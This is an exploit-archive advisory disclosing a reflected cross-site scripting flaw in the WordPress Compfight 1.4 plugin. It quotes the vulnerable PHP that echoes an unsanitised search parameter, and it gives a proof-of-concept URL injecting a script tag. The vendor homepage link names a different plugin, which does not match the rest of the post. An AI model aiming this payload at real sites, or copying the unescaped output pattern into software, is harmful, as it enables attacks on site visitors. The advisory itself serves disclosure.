Home / exploits WordPress Compfight 1.4 Cross Site Scripting
Posted on 12 July 2014
###################### # Exploit Title : Wordpress Compfight 1.4 Authenticated Cross Site Scripting # Exploit Author : Claudio Viviani # Vendor Homepage : http://wordpress.org/plugins/easy-banners/ # Software Link : http://downloads.wordpress.org/plugin/compfight.1.4.zip # Date : 2014-07-03 # Tested on : Windows 7 / Mozilla Firefox ###################### # Location : http://localhost/wp-content/plugins/compfight/compfight-search.php ###################### # Vulnerable code : if (!$search_value) { $input_text = 'Enter Keyword(s)'; } else { $input_text = $search_value; } if ($show_title) { $output .= '<h3 class="cf_search_title">Compfight</h3>'; $output .= '<p class="cf_search_subtitle">Locate the visual inspiration<br/>you need. Super fast!</p>'; } $output .= '<form method="GET" action="" id="cf-form">'; $output .= '<input type="text" name="search-value" id="search-value" value="' . $input_text . '" onClick="javascript:if(this.value=='Enter Keyword(s)') { this.value = ''; };" />'; $output .= '<input type="submit" name="search" id="search" value="Search" class="button" />'; $output .= '</form>'; $input_text variable not sanitized ###################### Exploit Code: http://localhost/plugins/compfight/compfight-search.php?search-value='"/><script>alert(1);</script>&search=Search ##################### Discovered By : Claudio Viviani http://www.homelab.it info@homelab.it https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ #####################
